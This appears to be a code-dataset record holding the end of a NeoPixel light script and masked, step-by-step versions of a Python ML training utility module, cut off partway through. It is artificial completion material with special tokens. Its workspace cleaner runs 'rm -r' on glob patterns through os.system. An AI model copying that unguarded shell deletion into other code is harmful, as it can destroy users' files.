0)\n elif (clr == 1):\n # Red & Green\n return (rval, rval, 0)\n elif (clr == 2):\n # Green\n return (0, rval, 0)\n elif (clr == 3):\n # Green & Blue\n return (0, rval, rval)\n elif (clr == 4):\n # Blue\n return (0, rval, rval)\n elif (clr == 5):\n # Blue & Red\n return (rval, 0, rval)\n else:\n return (0, 0, 0)\n\n# Function to turn off all the built in NeoPixels\ndef alloff():\n cpx.pixels.fill((0, 0, 0))\n\nmode = 1\npusha = 0\npushb = 0\nclr = 0\ni = 0\nwhile True:\n # NeoPixels are cpx.pixels[0-9]\n\n if (mode == 1):\n cpx.pixels[0] = flame(i, clr, 32)\n cpx.pixels[1] = flame(i, clr, 24)\n cpx.pixels[2] = flame(i, clr, 16)\n cpx.pixels[3] = flame(i, clr, 8)\n cpx.pixels[4] = flame(i, clr, 0)\n cpx.pixels[5] = flame(i, clr, 0)\n cpx.pixels[6] = flame(i, clr, 8)\n cpx.pixels[7] = flame(i, clr, 16)\n cpx.pixels[8] = flame(i, clr, 24)\n cpx.pixels[9] = flame(i, clr, 32)\n elif (mode == 2):\n cpx.pixels[0] = wheeln(i, 0)\n cpx.pixels[1] = wheeln(i, 24)\n cpx.pixels[2] = wheeln(i, 48)\n cpx.pixels[3] = wheeln(i, 72)\n cpx.pixels[4] = wheeln(i, 96)\n cpx.pixels[5] = wheeln(i, 120)\n cpx.pixels[6] = wheeln(i, 144)\n cpx.pixels[7] = wheeln(i, 168)\n cpx.pixels[8] = wheeln(i, 192)\n cpx.pixels[9] = wheeln(i, 216)\n elif (mode == 3):\n cpx.pixels[0] = randcolor()\n cpx.pixels[1] = randcolor()\n cpx.pixels[2] = randcolor()\n cpx.pixels[3] = randcolor()\n cpx.pixels[4] = randcolor()\n cpx.pixels[5] = randcolor()\n cpx.pixels[6] = randcolor()\n cpx.pixels[7] = randcolor()\n cpx.pixels[8] = randcolor()\n cpx.pixels[9] = randcolor()\n else:\n # Mode = 0 so turn All Off\n alloff()\n\n # Button A is bottom button on hat\n if cpx.button_a:\n print(\"Button A on Bottom Pressed! Changing mode to ALL OFF.\")\n pusha = 1\n # Button B is top button on hat\n if cpx.button_b:\n print(\"Button B on Top Pressed! Changing mode.\")\n pushb = 1\n\n i = (i+1) % 256\n #print (i)\n if (i == 255):\n clr = (clr+1) % 6\n\n if ((i == 63) | (i == 127) | (i == 191) | (i >= 255)) and (pusha == 1):\n mode = 0\n pusha = 0\n i = 0\n if ((i == 63) | (i == 127) | (i == 191) | (i >= 255)) and (pushb == 1):\n mode = (mode+1)\n pushb = 0\n i = 0\n if (mode > 3):\n mode = 1\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
class Timer:
def __init__(self):
self._time = 0
self.is_stopped = False
self._start()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@property
def time(self):
self._stop()
return self._time
def to_string(self):
return '{:02d}:{:02d}'.format(*self.m_s())
<|reserved_special_token_0|>
class Printer:
def __init__(self, fold=0):
self._print = []
self.fold = fold
def pprint(self, **kwargs):
str_log = '\r'
for key in kwargs.keys():
str_log += '{}: {} - '.format(key, kwargs[key])
print(str_log, end='')
def update(self, epoch, losses, scores, time=None):
str_log = f'⏰ {time} | ' if time else ''
str_log += 'Epoch: {} - Loss: {:.5f} - ValLoss: {:.5f}'.format(epoch,
losses['loss'][epoch], losses['val_loss'][epoch])
for metric_name, value in scores.items():
str_log += ' - {}: {:.5f}'.format(metric_name, value)
self._print.append(str_log)
def show(self):
clear_output()
print('_' * 100, '\nFold ', self.fold)
for p in self._print:
print('_' * 100)
print('| ' + p)
def update_and_show(self, epoch, losses, score, time=None):
self.update(epoch, losses, score, time)
self.show()
class WorkplaceManager:
def __init__(self, seed, dirs, exts, n_fols=10):
self.seed = seed
self.dirs = dirs
self.exts = exts
self.n_folds = n_fols
self._set_workplace()
@staticmethod
def create_dir(dir):
os.makedirs(dir, exist_ok=True)
def _create_dirs(self):
print('Created {}'.format(' '.join(self.dirs)))
for d in self.dirs:
self.create_dir(d)
def _clear_dirs(self):
print('Deleted {}'.format(' '.join(self.dirs)))
self.clear([f'{d}*' for d in self.dirs])
def _clear_files(self):
print('Deleted {}'.format(' '.join(self.exts)))
self.clear([f'*{ext}' for ext in self.exts])
def clear(self, objs_name):
os.system('rm -r {}'.format(' '.join(objs_name)))
def _set_workplace(self):
seed_everything(self.seed)
if os.path.exists('models') and len(os.listdir('models/')
) == self.n_folds:
self._clear_dirs()
self._clear_files()
self._create_dirs()
class CrossValLogger:
def __init__(self, df, metric_name, n_folds=10, oof_cv='cv_score.pkl',
path='evals/roberta-base/'):
assert df.fold.nunique(
) == n_folds, 'Unconsistency between df.n_folds and n_folds'
self.df = df.copy()
self.metric_name = metric_name
self.path = path
self.n_folds = n_folds
self.oof_cv = oof_cv
self.score1, self.score2 = None, None
def _retrieve_eval_preds(self):
ph = self.path + 'fold_{}_best_eval.npy'
shape = self.df.shape[0], self.df.label.nunique()
preds = np.empty(shape, dtype=np.float32)
for i in self.df.fold.unique():
index = self.df[self.df.fold == i].index.values
fold_pred = np.load(ph.format(i))
preds[index] = fold_pred[:, :]
return preds
def _load_oof_cv_score(self):
score = 0
with open(self.oof_cv, 'rb') as f:
score = pickle.load(f)
f.close()
return score
def show_results(self, return_score=False):
if self.score1 is None:
eval_preds = self._retrieve_eval_preds()
self.score1 = self._load_oof_cv_score() / self.n_folds
self.score2 = evaluation(self.df.label.values, eval_preds,
labels=self.df.label.unique())[self.metric_name]
print('OOF_CV_SCORE: {:.5f} | OVR_SCORE: {:.5f}'.format(self.score1,
self.score2))
if return_score:
return self.score1, self.score2
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class EarlyStopping:
def __init__(self, patience=5, mode='max'):
self.step = 0
self.stop = False
self.score = 0
self.patience = patience
self.mode = mode
self.mult = 1 if mode == 'max' else -1
def update(self, score):
if self.mult * (self.score - score) > 0:
self.step += 1
else:
self.step = 0
self.score = score
if self.step == self.patience:
self.stop = True
class Timer:
def __init__(self):
self._time = 0
self.is_stopped = False
self._start()
def _start(self):
self._time = time()
def _stop(self):
if not self.is_stopped:
self.is_stopped = True
self._time = time() - self._time
@property
def time(self):
self._stop()
return self._time
def to_string(self):
return '{:02d}:{:02d}'.format(*self.m_s())
def m_s(self):
t = round(self.time)
s = t % 60
m = t // 60
return m, s
class Printer:
def __init__(self, fold=0):
self._print = []
self.fold = fold
def pprint(self, **kwargs):
str_log = '\r'
for key in kwargs.keys():
str_log += '{}: {} - '.format(key, kwargs[key])
print(str_log, end='')
def update(self, epoch, losses, scores, time=None):
str_log = f'⏰ {time} | ' if time else ''
str_log += 'Epoch: {} - Loss: {:.5f} - ValLoss: {:.5f}'.format(epoch,
losses['loss'][epoch], losses['val_loss'][epoch])
for metric_name, value in scores.items():
str_log += ' - {}: {:.5f}'.format(metric_name, value)
self._print.append(str_log)
def show(self):
clear_output()
print('_' * 100, '\nFold ', self.fold)
for p in self._print:
print('_' * 100)
print('| ' + p)
def update_and_show(self, epoch, losses, score, time=None):
self.update(epoch, losses, score, time)
self.show()
class WorkplaceManager:
def __init__(self, seed, dirs, exts, n_fols=10):
self.seed = seed
self.dirs = dirs
self.exts = exts
self.n_folds = n_fols
self._set_workplace()
@staticmethod
def create_dir(dir):
os.makedirs(dir, exist_ok=True)
def _create_dirs(self):
print('Created {}'.format(' '.join(self.dirs)))
for d in self.dirs:
self.create_dir(d)
def _clear_dirs(self):
print('Deleted {}'.format(' '.join(self.dirs)))
self.clear([f'{d}*' for d in self.dirs])
def _clear_files(self):
print('Deleted {}'.format(' '.join(self.exts)))
self.clear([f'*{ext}' for ext in self.exts])
def clear(self, objs_name):
os.system('rm -r {}'.format(' '.join(objs_name)))
def _set_workplace(self):
seed_everything(self.seed)
if os.path.exists('models') and len(os.listdir('models/')
) == self.n_folds:
self._clear_dirs()
self._clear_files()
self._create_dirs()
class CrossValLogger:
def __init__(self, df, metric_name, n_folds=10, oof_cv='cv_score.pkl',
path='evals/roberta-base/'):
assert df.fold.nunique(
) == n_folds, 'Unconsistency between df.n_folds and n_folds'
self.df = df.copy()
self.metric_name = metric_name
self.path = path
self.n_folds = n_folds
self.oof_cv = oof_cv
self.score1, self.score2 = None, None
def _retrieve_eval_preds(self):
ph = self.path + 'fold_{}_best_eval.npy'
shape = self.df.shape[0], self.df.label.nunique()
preds = np.empty(shape, dtype=np.float32)
for i in self.df.fold.unique():
index = self.df[self.df.fold == i].index.values
fold_pred = np.load(ph.format(i))
preds[index] = fold_pred[:, :]
return preds
def _load_oof_cv_score(self):
score = 0
with open(self.oof_cv, 'rb') as f:
score = pickle.load(f)
f.close()
return score
def show_results(self, return_score=False):
if self.score1 is None:
eval_preds = self._retrieve_eval_preds()
self.score1 = self._load_oof_cv_score() / self.n_folds
self.score2 = evaluation(self.df.label.values, eval_preds,
labels=self.df.label.unique())[self.metric_name]
print('OOF_CV_SCORE: {:.5f} | OVR_SCORE: {:.5f}'.format(self.score1,
self.score2))
if return_score:
return self.score1, self.score2
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def is_blackbone(n):
return n.startswith('model')
<|reserved_special_token_0|>
def getTokenizer(model_config, tok_name):
return AutoTokenizer.from_pretrained(tok_name, config=model_config,
add_prefix_space=False)
class EarlyStopping:
def __init__(self, patience=5, mode='max'):
self.step = 0
self.stop = False
self.score = 0
self.patience = patience
self.mode = mode
self.mult = 1 if mode == 'max' else -1
def update(self, score):
if self.mult * (self.score - score) > 0:
self.step += 1
else:
self.step = 0
self.score = score
if self.step == self.patience:
self.stop = True
class Timer:
def __init__(self):
self._time = 0
self.is_stopped = False
self._start()
def _start(self):
self._time = time()
def _stop(self):
if not self.is_stopped:
self.is_stopped = True
self._time = time() - self._time
@property
def time(self):
self._stop()
return self._time
def to_string(self):
return '{:02d}:{:02d}'.format(*self.m_s())
def m_s(self):
t = round(self.time)
s = t % 60
m = t // 60
return m, s
class Printer:
def __init__(self, fold=0):
self._print = []
self.fold = fold
def pprint(self, **kwargs):
str_log = '\r'
for key in kwargs.keys():
str_log += '{}: {} - '.format(key, kwargs[key])
print(str_log, end='')
def update(self, epoch, losses, scores, time=None):
str_log = f'⏰ {time} | ' if time else ''
str_log += 'Epoch: {} - Loss: {:.5f} - ValLoss: {:.5f}'.format(epoch,
losses['loss'][epoch], losses['val_loss'][epoch])
for metric_name, value in scores.items():
str_log += ' - {}: {:.5f}'.format(metric_name, value)
self._print.append(str_log)
def show(self):
clear_output()
print('_' * 100, '\nFold ', self.fold)
for p in self._print:
print('_' * 100)
print('| ' + p)
def update_and_show(self, epoch, losses, score, time=None):
self.update(epoch, losses, score, time)
self.show()
class WorkplaceManager:
def __init__(self, seed, dirs, exts, n_fols=10):
self.seed = seed
self.dirs = dirs
self.exts = exts
self.n_folds = n_fols
self._set_workplace()
@staticmethod
def create_dir(dir):
os.makedirs(dir, exist_ok=True)
def _create_dirs(self):
print('Created {}'.format(' '.join(self.dirs)))
for d in self.dirs:
self.create_dir(d)
def _clear_dirs(self):
print('Deleted {}'.format(' '.join(self.dirs)))
self.clear([f'{d}*' for d in self.dirs])
def _clear_files(self):
print('Deleted {}'.format(' '.join(self.exts)))
self.clear([f'*{ext}' for ext in self.exts])
def clear(self, objs_name):
os.system('rm -r {}'.format(' '.join(objs_name)))
def _set_workplace(self):
seed_everything(self.seed)
if os.path.exists('models') and len(os.listdir('models/')
) == self.n_folds:
self._clear_dirs()
self._clear_files()
self._create_dirs()
class CrossValLogger:
def __init__(self, df, metric_name, n_folds=10, oof_cv='cv_score.pkl',
path='evals/roberta-base/'):
assert df.fold.nunique(
) == n_folds, 'Unconsistency between df.n_folds and n_folds'
self.df = df.copy()
self.metric_name = metric_name
self.path = path
self.n_folds = n_folds
self.oof_cv = oof_cv
self.score1, self.score2 = None, None
def _retrieve_eval_preds(self):
ph = self.path + 'fold_{}_best_eval.npy'
shape = self.df.shape[0], self.df.label.nunique()
preds = np.empty(shape, dtype=np.float32)
for i in self.df.fold.unique():
index = self.df[self.df.fold == i].index.values
fold_pred = np.load(ph.format(i))
preds[index] = fold_pred[:, :]
return preds
def _load_oof_cv_score(self):
score = 0
with open(self.oof_cv, 'rb') as f:
score = pickle.load(f)
f.close()
return score
def show_results(self, return_score=False):
if self.score1 is None:
eval_preds = self._retrieve_eval_preds()
self.score1 = self._load_oof_cv_score() / self.n_folds
self.score2 = evaluation(self.df.label.values, eval_preds,
labels=self.df.label.unique())[self.metric_name]
print('OOF_CV_SCORE: {:.5f} | OVR_SCORE: {:.5f}'.format(self.score1,
self.score2))
if return_score:
return self.score1, self.score2
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def seed_everything(seed):
print(f'Set seed to {seed}.')
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
if torch.cuda.is_available():
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
def is_blackbone(n):
return n.startswith('model')
def evaluation(ytrue, y_pred, labels=[0, 1, 2, 3]):
log = log_loss(ytrue, y_pred, labels=labels)
f1 = f1_score(ytrue, y_pred.argmax(1), average='weighted')
acc = accuracy_score(ytrue, y_pred.argmax(1))
return {'Logloss': log, 'F1': f1, 'Acc': acc}
def getTokenizer(model_config, tok_name):
return AutoTokenizer.from_pretrained(tok_name, config=model_config,
add_prefix_space=False)
class EarlyStopping:
def __init__(self, patience=5, mode='max'):
self.step = 0
self.stop = False
self.score = 0
self.patience = patience
self.mode = mode
self.mult = 1 if mode == 'max' else -1
def update(self, score):
if self.mult * (self.score - score) > 0:
self.step += 1
else:
self.step = 0
self.score = score
if self.step == self.patience:
self.stop = True
class Timer:
def __init__(self):
self._time = 0
self.is_stopped = False
self._start()
def _start(self):
self._time = time()
def _stop(self):
if not self.is_stopped:
self.is_stopped = True
self._time = time() - self._time
@property
def time(self):
self._stop()
return self._time
def to_string(self):
return '{:02d}:{:02d}'.format(*self.m_s())
def m_s(self):
t = round(self.time)
s = t % 60
m = t // 60
return m, s
class Printer:
def __init__(self, fold=0):
self._print = []
self.fold = fold
def pprint(self, **kwargs):
str_log = '\r'
for key in kwargs.keys():
str_log += '{}: {} - '.format(key, kwargs[key])
print(str_log, end='')
def update(self, epoch, losses, scores, time=None):
str_log = f'⏰ {time} | ' if time else ''
str_log += 'Epoch: {} - Loss: {:.5f} - ValLoss: {:.5f}'.format(epoch,
losses['loss'][epoch], losses['val_loss'][epoch])
for metric_name, value in scores.items():
str_log += ' - {}: {:.5f}'.format(metric_name, value)
self._print.append(str_log)
def show(self):
clear_output()
print('_' * 100, '\nFold ', self.fold)
for p in self._print:
print('_' * 100)
print('| ' + p)
def update_and_show(self, epoch, losses, score, time=None):
self.update(epoch, losses, score, time)
self.show()
class WorkplaceManager:
def __init__(self, seed, dirs, exts, n_fols=10):
self.seed = seed
self.dirs = dirs
self.exts = exts
self.n_folds = n_fols
self._set_workplace()
@staticmethod
def create_dir(dir):
os.makedirs(dir, exist_ok=True)
def _create_dirs(self):
print('Created {}'.format(' '.join(self.dirs)))
for d in self.dirs:
self.create_dir(d)
def _clear_dirs(self):
print('Deleted {}'.format(' '.join(self.dirs)))
self.clear([f'{d}*' for d in self.dirs])
def _clear_files(self):
print('Deleted {}'.format(' '.join(self.exts)))
self.clear([f'*{ext}' for ext in self.exts])
def clear(self, objs_name):
os.system('rm -r {}'.format(' '.join(objs_name)))
def _set_workplace(self):
seed_everything(self.seed)
if os.path.exists('models') and len(os.listdir('models/')
) == self.n_folds:
self._clear_dirs()
self._clear_files()
self._create_dirs()
class CrossValLogger:
def __init__(self, df, metric_name, n_folds=10, oof_cv='cv_score.pkl',
path='evals/roberta-base/'):
assert df.fold.nunique(
) == n_folds, 'Unconsistency between df.n_folds and n_folds'
self.df = df.copy()
self.metric_name = metric_name
self.path = path
self.n_folds = n_folds
self.oof_cv = oof_cv
self.score1, self.score2 = None, None
def _retrieve_eval_preds(self):
ph = self.path + 'fold_{}_best_eval.npy'
shape = self.df.shape[0], self.df.label.nunique()
preds = np.empty(shape, dtype=np.float32)
for i in self.df.fold.unique():
index = self.df[self.df.fold == i].index.values
fold_pred = np.load(ph.format(i))
preds[index] = fold_pred[:, :]
return preds
def _load_oof_cv_score(self):
score = 0
with open(self.oof_cv, 'rb') as f:
score = pickle.load(f)
f.close()
return score
def show_results(self, return_score=False):
if self.score1 is None:
eval_preds = self._retrieve_eval_preds()
self.score1 = self._load_oof_cv_score() / self.n_folds
self.score2 = evaluation(self.df.label.values, eval_preds,
labels=self.df.label.unique())[self.metric_name]
print('OOF_CV_SCORE: {:.5f} | OVR_SCORE: {:.5f}'.format(self.score1,
self.score2))
if return_score:
return self.score1, self.score2
<|reserved_special_token_1|>
import os, gc, random
from time import time
import pickle
import numpy as np
import pandas as pd
from sklearn.metrics import log_loss, f1_score, accuracy_score
from collections import Counter
from IPython.display import clear_output
import torch
from transformers import (
AutoTokenizer, RobertaTokenizerFast,
BertTokenizerFast, ElectraTokenizerFast
)
def seed_everything(seed):
print(f'Set seed to {seed}.')
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
if torch.cuda.is_available():
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
def is_blackbone(n):
return n.startswith('model')
def evaluation(ytrue, y_pred, labels=[0,1,2,3]):
log = log_loss(ytrue, y_pred, labels=labels)
f1 = f1_score(ytrue, y_pred.argmax(1), average='weighted')
acc = accuracy_score(ytrue, y_pred.argmax(1))
return {'Logloss': log, 'F1': f1, 'Acc': acc}
def getTokenizer(model_config, tok_name):
return AutoTokenizer.from_pretrained(tok_name, config=model_config, add_prefix_space=False)
class EarlyStopping:
def __init__(self, patience=5, mode='max'):
self.step = 0
self.stop = False
self.score = 0
self.patience = patience
self.mode = mode
self.mult = 1 if mode=='max' else -1
def update(self, score):
if self.mult*(self.score-score) > 0:
self.step += 1
else:
self.step = 0
self.score = score
if self.step == self.patience:
self.stop = True
class Timer:
def __init__(self):
self._time = 0
self.is_stopped = False
self._start()
def _start(self):
self._time = time()
def _stop(self):
if not self.is_stopped:
self.is_stopped = True
self._time = time()-self._time
@property
def time(self):
self._stop()
return self._time
def to_string(self):
return "{:02d}:{:02d}".format(*self.m_s())
def m_s(self):
t = round(self.time)
s = t%60
m = t//60
return m,s
class Printer:
def __init__(self, fold=0):
self._print = []
self.fold = fold
def pprint(self, **kwargs):
str_log = "\r"
for key in kwargs.keys():
str_log += "{}: {} - ".format(key, kwargs[key])
print(str_log, end='')
def update(self, epoch, losses, scores, time = None):
str_log = f"⏰ {time} | " if time else ""
str_log += "Epoch: {} - Loss: {:.5f} - ValLoss: {:.5f}".format(epoch, losses['loss'][epoch], losses['val_loss'][epoch])
for metric_name, value in scores.items():
str_log += ' - {}: {:.5f}'.format(metric_name, value)
self._print.append(str_log)
def show(self):
clear_output()
print("_"*100, "\nFold ", self.fold)
for p in self._print:
print("_" * 100)
print('| '+ p)
def update_and_show(self, epoch, losses, score, time=None):
self.update(epoch, losses, score, time)
self.show()
class WorkplaceManager:
def __init__(self, seed, dirs, exts, n_fols=10):
self.seed = seed
self.dirs = dirs
self.exts = exts
self.n_folds = n_fols
self._set_workplace()
@staticmethod
def create_dir(dir):
os.makedirs(dir, exist_ok=True)
def _create_dirs(self):
print('Created {}'.format(' '.join(self.dirs)))
for d in self.dirs:
self.create_dir(d)
def _clear_dirs(self):
print('Deleted {}'.format(' '.join(self.dirs)))
self.clear([f'{d}*' for d in self.dirs])
def _clear_files(self):
print('Deleted {}'.format(' '.join(self.exts)))
self.clear([f'*{ext}' for ext in self.exts])
def clear(self, objs_name):
os.system('rm -r {}'.format(' '.join(objs_name)))
def _set_workplace(self):
seed_everything(self.seed)
if os.path.exists('models') and len(os.listdir('models/')) == self.n_folds:
self._clear_dirs()
self._clear_files()
self._create_dirs()
class CrossValLogger:
def __init__(self, df, metric_name, n_folds=10, oof_cv = 'cv_score.pkl', path='evals/roberta-base/'):
assert df.fold.nunique()==n_folds, "Unconsistency between df.n_folds and n_folds"
self.df = df.copy()
self.metric_name = metric_name
self.path = path
self.n_folds = n_folds
self.oof_cv = oof_cv
self.score1, self.score2 = None, None
def _retrieve_eval_preds(self):
ph = self.path+'fold_{}_best_eval.npy'
shape = ( self.df.shape[0], self.df.label.nunique() )
preds = np.empty(shape, dtype=np.float32)
for i in self.df.fold.unique():
index = self.df[self.df.fold==i].index.values
fold_pred = np.load(ph.format(i))
preds[index] = fold_pred[:, :]
return preds
def _load_oof_cv_score(self):
score = 0
with open(self.oof_cv, 'rb') as f:
score = pickle.load(f)
f.close()
return score
def show_results(self, return_score=False):
if self.score1 is None:
eval_preds = self._retrieve_eval_preds()
self.score1 = self._load_oof_cv_score() / self.n_folds #oof_cv_scores
self.score2 = evaluation(self.df.label.values, eval_preds, labels=self.df.label.unique())[self.metric_name] #ovr_score
print('OOF_CV_SCORE: {:.5f} | OVR_SCORE: {:.5f}'.format(self.score1, self.score2))
if return_score: return self.score1, self.score2
|
flexible
|
{
"blob_id": "458124aa0d6f04268ad052f74d546b12d3f3f5f7",
"index": 8989,
"step-1": "<mask token>\n\n\nclass Timer:\n\n def __init__(self):\n self._time = 0\n self.is_stopped = False\n self._start()\n <mask token>\n <mask token>\n\n @property\n def time(self):\n self._stop()\n return self._time\n\n def to_string(self):\n return '{:02d}:{:02d}'.format(*self.m_s())\n <mask token>\n\n\nclass Printer:\n\n def __init__(self, fold=0):\n self._print = []\n self.fold = fold\n\n def pprint(self, **kwargs):\n str_log = '\\r'\n for key in kwargs.keys():\n str_log += '{}: {} - '.format(key, kwargs[key])\n print(str_log, end='')\n\n def update(self, epoch, losses, scores, time=None):\n str_log = f'⏰ {time} | ' if time else ''\n str_log += 'Epoch: {} - Loss: {:.5f} - ValLoss: {:.5f}'.format(epoch,\n losses['loss'][epoch], losses['val_loss'][epoch])\n for metric_name, value in scores.items():\n str_log += ' - {}: {:.5f}'.format(metric_name, value)\n self._print.append(str_log)\n\n def show(self):\n clear_output()\n print('_' * 100, '\\nFold ', self.fold)\n for p in self._print:\n print('_' * 100)\n print('| ' + p)\n\n def update_and_show(self, epoch, losses, score, time=None):\n self.update(epoch, losses, score, time)\n self.show()\n\n\nclass WorkplaceManager:\n\n def __init__(self, seed, dirs, exts, n_fols=10):\n self.seed = seed\n self.dirs = dirs\n self.exts = exts\n self.n_folds = n_fols\n self._set_workplace()\n\n @staticmethod\n def create_dir(dir):\n os.makedirs(dir, exist_ok=True)\n\n def _create_dirs(self):\n print('Created {}'.format(' '.join(self.dirs)))\n for d in self.dirs:\n self.create_dir(d)\n\n def _clear_dirs(self):\n print('Deleted {}'.format(' '.join(self.dirs)))\n self.clear([f'{d}*' for d in self.dirs])\n\n def _clear_files(self):\n print('Deleted {}'.format(' '.join(self.exts)))\n self.clear([f'*{ext}' for ext in self.exts])\n\n def clear(self, objs_name):\n os.system('rm -r {}'.format(' '.join(objs_name)))\n\n def _set_workplace(self):\n seed_everything(self.seed)\n if os.path.exists('models') and len(os.listdir('models/')\n ) == self.n_folds:\n self._clear_dirs()\n self._clear_files()\n self._create_dirs()\n\n\nclass CrossValLogger:\n\n def __init__(self, df, metric_name, n_folds=10, oof_cv='cv_score.pkl',\n path='evals/roberta-base/'):\n assert df.fold.nunique(\n ) == n_folds, 'Unconsistency between df.n_folds and n_folds'\n self.df = df.copy()\n self.metric_name = metric_name\n self.path = path\n self.n_folds = n_folds\n self.oof_cv = oof_cv\n self.score1, self.score2 = None, None\n\n def _retrieve_eval_preds(self):\n ph = self.path + 'fold_{}_best_eval.npy'\n shape = self.df.shape[0], self.df.label.nunique()\n preds = np.empty(shape, dtype=np.float32)\n for i in self.df.fold.unique():\n index = self.df[self.df.fold == i].index.values\n fold_pred = np.load(ph.format(i))\n preds[index] = fold_pred[:, :]\n return preds\n\n def _load_oof_cv_score(self):\n score = 0\n with open(self.oof_cv, 'rb') as f:\n score = pickle.load(f)\n f.close()\n return score\n\n def show_results(self, return_score=False):\n if self.score1 is None:\n eval_preds = self._retrieve_eval_preds()\n self.score1 = self._load_oof_cv_score() / self.n_folds\n self.score2 = evaluation(self.df.label.values, eval_preds,\n labels=self.df.label.unique())[self.metric_name]\n print('OOF_CV_SCORE: {:.5f} | OVR_SCORE: {:.5f}'.format(self.score1,\n self.score2))\n if return_score:\n return self.score1, self.score2\n",
"step-2": "<mask token>\n\n\nclass EarlyStopping:\n\n def __init__(self, patience=5, mode='max'):\n self.step = 0\n self.stop = False\n self.score = 0\n self.patience = patience\n self.mode = mode\n self.mult = 1 if mode == 'max' else -1\n\n def update(self, score):\n if self.mult * (self.score - score) > 0:\n self.step += 1\n else:\n self.step = 0\n self.score = score\n if self.step == self.patience:\n self.stop = True\n\n\nclass Timer:\n\n def __init__(self):\n self._time = 0\n self.is_stopped = False\n self._start()\n\n def _start(self):\n self._time = time()\n\n def _stop(self):\n if not self.is_stopped:\n self.is_stopped = True\n self._time = time() - self._time\n\n @property\n def time(self):\n self._stop()\n return self._time\n\n def to_string(self):\n return '{:02d}:{:02d}'.format(*self.m_s())\n\n def m_s(self):\n t = round(self.time)\n s = t % 60\n m = t // 60\n return m, s\n\n\nclass Printer:\n\n def __init__(self, fold=0):\n self._print = []\n self.fold = fold\n\n def pprint(self, **kwargs):\n str_log = '\\r'\n for key in kwargs.keys():\n str_log += '{}: {} - '.format(key, kwargs[key])\n print(str_log, end='')\n\n def update(self, epoch, losses, scores, time=None):\n str_log = f'⏰ {time} | ' if time else ''\n str_log += 'Epoch: {} - Loss: {:.5f} - ValLoss: {:.5f}'.format(epoch,\n losses['loss'][epoch], losses['val_loss'][epoch])\n for metric_name, value in scores.items():\n str_log += ' - {}: {:.5f}'.format(metric_name, value)\n self._print.append(str_log)\n\n def show(self):\n clear_output()\n print('_' * 100, '\\nFold ', self.fold)\n for p in self._print:\n print('_' * 100)\n print('| ' + p)\n\n def update_and_show(self, epoch, losses, score, time=None):\n self.update(epoch, losses, score, time)\n self.show()\n\n\nclass WorkplaceManager:\n\n def __init__(self, seed, dirs, exts, n_fols=10):\n self.seed = seed\n self.dirs = dirs\n self.exts = exts\n self.n_folds = n_fols\n self._set_workplace()\n\n @staticmethod\n def create_dir(dir):\n os.makedirs(dir, exist_ok=True)\n\n def _create_dirs(self):\n print('Created {}'.format(' '.join(self.dirs)))\n for d in self.dirs:\n self.create_dir(d)\n\n def _clear_dirs(self):\n print('Deleted {}'.format(' '.join(self.dirs)))\n self.clear([f'{d}*' for d in self.dirs])\n\n def _clear_files(self):\n print('Deleted {}'.format(' '.join(self.exts)))\n self.clear([f'*{ext}' for ext in self.exts])\n\n def clear(self, objs_name):\n os.system('rm -r {}'.format(' '.join(objs_name)))\n\n def _set_workplace(self):\n seed_everything(self.seed)\n if os.path.exists('models') and len(os.listdir('models/')\n ) == self.n_folds:\n self._clear_dirs()\n self._clear_files()\n self._create_dirs()\n\n\nclass CrossValLogger:\n\n def __init__(self, df, metric_name, n_folds=10, oof_cv='cv_score.pkl',\n path='evals/roberta-base/'):\n assert df.fold.nunique(\n ) == n_folds, 'Unconsistency between df.n_folds and n_folds'\n self.df = df.copy()\n self.metric_name = metric_name\n self.path = path\n self.n_folds = n_folds\n self.oof_cv = oof_cv\n self.score1, self.score2 = None, None\n\n def _retrieve_eval_preds(self):\n ph = self.path + 'fold_{}_best_eval.npy'\n shape = self.df.shape[0], self.df.label.nunique()\n preds = np.empty(shape, dtype=np.float32)\n for i in self.df.fold.unique():\n index = self.df[self.df.fold == i].index.values\n fold_pred = np.load(ph.format(i))\n preds[index] = fold_pred[:, :]\n return preds\n\n def _load_oof_cv_score(self):\n score = 0\n with open(self.oof_cv, 'rb') as f:\n score = pickle.load(f)\n f.close()\n return score\n\n def show_results(self, return_score=False):\n if self.score1 is None:\n eval_preds = self._retrieve_eval_preds()\n self.score1 = self._load_oof_cv_score() / self.n_folds\n self.score2 = evaluation(self.df.label.values, eval_preds,\n labels=self.df.label.unique())[self.metric_name]\n print('OOF_CV_SCORE: {:.5f} | OVR_SCORE: {:.5f}'.format(self.score1,\n self.score2))\n if return_score:\n return self.score1, self.score2\n",
"step-3": "<mask token>\n\n\ndef is_blackbone(n):\n return n.startswith('model')\n\n\n<mask token>\n\n\ndef getTokenizer(model_config, tok_name):\n return AutoTokenizer.from_pretrained(tok_name, config=model_config,\n add_prefix_space=False)\n\n\nclass EarlyStopping:\n\n def __init__(self, patience=5, mode='max'):\n self.step = 0\n self.stop = False\n self.score = 0\n self.patience = patience\n self.mode = mode\n self.mult = 1 if mode == 'max' else -1\n\n def update(self, score):\n if self.mult * (self.score - score) > 0:\n self.step += 1\n else:\n self.step = 0\n self.score = score\n if self.step == self.patience:\n self.stop = True\n\n\nclass Timer:\n\n def __init__(self):\n self._time = 0\n self.is_stopped = False\n self._start()\n\n def _start(self):\n self._time = time()\n\n def _stop(self):\n if not self.is_stopped:\n self.is_stopped = True\n self._time = time() - self._time\n\n @property\n def time(self):\n self._stop()\n return self._time\n\n def to_string(self):\n return '{:02d}:{:02d}'.format(*self.m_s())\n\n def m_s(self):\n t = round(self.time)\n s = t % 60\n m = t // 60\n return m, s\n\n\nclass Printer:\n\n def __init__(self, fold=0):\n self._print = []\n self.fold = fold\n\n def pprint(self, **kwargs):\n str_log = '\\r'\n for key in kwargs.keys():\n str_log += '{}: {} - '.format(key, kwargs[key])\n print(str_log, end='')\n\n def update(self, epoch, losses, scores, time=None):\n str_log = f'⏰ {time} | ' if time else ''\n str_log += 'Epoch: {} - Loss: {:.5f} - ValLoss: 